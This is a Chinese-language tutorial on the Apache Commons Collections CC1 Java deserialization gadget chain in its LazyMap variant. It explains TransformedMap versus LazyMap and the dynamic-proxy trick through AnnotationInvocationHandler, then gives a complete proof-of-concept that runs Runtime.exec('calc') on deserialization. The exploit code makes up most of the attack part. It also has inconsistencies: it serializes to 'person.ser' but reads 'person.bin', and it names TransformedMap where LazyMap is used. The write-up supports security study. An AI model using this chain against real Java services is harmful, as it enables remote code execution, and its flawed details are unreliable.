java cc链1 Lazymap
这条链和cc链1都是利用InvokerTransformer.transform
,后续的调用方法不同,这里,一个通过TransformedMap的cheakvalue方法,这个则是利用Lazymap的get方法
不同点
TransformedMap
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"Calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
outerMap.put("test", "666");
LazyMap
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"}),
};
ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
HashMap<Object,Object> map=new HashMap<>();
Map<Object,Object> transformedmap= LazyMap.decorate(map,chainedTransformer);
transformedmap.get("test");
这两个的调用方法很类似,只不过TransformedMap.put-->transformValue
,LazyMap.get(仅在当前代码范围内),均可以正常进行命令执行,
在AnnotationInvocationHandler
中的invoke
方法中存在
Object result = memberValues.get(member);
这里的TransformedMap是可以控制的,这里使用动态代理的方式进行利用,这里贴一下简单的动态代理实现代码
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
interface MyInterface {
void doSomething();
}
class MyInterfaceImpl implements MyInterface {
public void doSomething() {
System.out.println("Doing something...");
}
}
class MyInvocationHandler implements InvocationHandler {
private Object target;
public MyInvocationHandler(Object target) {
this.target = target;
}
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("Before method call...");
Object result = method.invoke(target, args);
System.out.println("After method call...");
return result;
}
}
public class DynamicProxyExample {
public static void main(String[] args) {
MyInterfaceImpl myObj = new MyInterfaceImpl();
MyInterface proxyObj = (MyInterface) Proxy.newProxyInstance(
MyInterfaceImpl.class.getClassLoader(),
myObj.getClass().getInterfaces(),
new MyInvocationHandler(myObj));
proxyObj.doSomething();
}
}
当doSomething()
被调用时,MyInvocationHandler
下面的invoke
方法也会被执行,如果我们创建AnnotationInvocationHandler
动态代理,如果外部方法执行,那么AnnotationInvocationHandler
的invoke也会执行,那么这时候就需要外部方法调用,刚好在readObject中有个for循环中存在memberValues.entrySet()
并且这里的memberValues参数可控,当我们传入的值为Map时,就是个标准的动态代理,memberValue.getKey()
变为了Map.entrySet()
,这里的invoke方法正常执行,并且还绕过了invoke
方法的过滤,
if (member.equals("equals") && paramTypes.length == 1 &&
paramTypes[0] == Object.class)
return equalsImpl(args[0]);//是否调用equals方法
if (paramTypes.length != 0)
throw new AssertionError("Too many parameters for an annotation method");//是否为有参函数
for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
String name = memberValue.getKey();
Class<?> memberType = memberTypes.get(name);
if (memberType != null) { // i.e. member still exists
Object value = memberValue.getValue();
if (!(memberType.isInstance(value) ||
value instanceof ExceptionProxy)) {
memberValue.setValue(
new AnnotationTypeMismatchExceptionProxy(
value.getClass() + "[" + value + "]").setMember(
annotationType.members().get(name)));
}
}
}
最后创建实例,利用readObject方法进行代码执行,最终的poc为
public static void serialize(Object object) throws Exception {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("person.ser"));
oos.writeObject(object);
}
public static void unserialize(String filename) throws Exception {
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
objectInputStream.readObject();
}
public static void main(String[] args) throws Exception {
org.apache.commons.collections.Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, null}),
new InvokerTransformer("exec",
new Class[]{String.class},
new String[]{"calc"}),
};
ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
HashMap<Object,Object> map=new HashMap<>();
Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
// transformedmap.get("test");
Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
construct.setAccessible(true);
InvocationHandler annotationInvocationHandler = (InvocationHandler) construct.newInstance(Override.class,lazymap);
Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), lazymap.getClass().getInterfaces(), annotationInvocationHandler);
annotationInvocationHandler = (InvocationHandler) construct.newInstance(Override.class, proxyMap);
serialize(annotationInvocationHandler);
unserialize("person.bin");
}
在这里,代理可以理解为通过AnnotationInvocationHandler
调用Map中的方法,这里的Override.class
表示注解,换成其他注解也可以。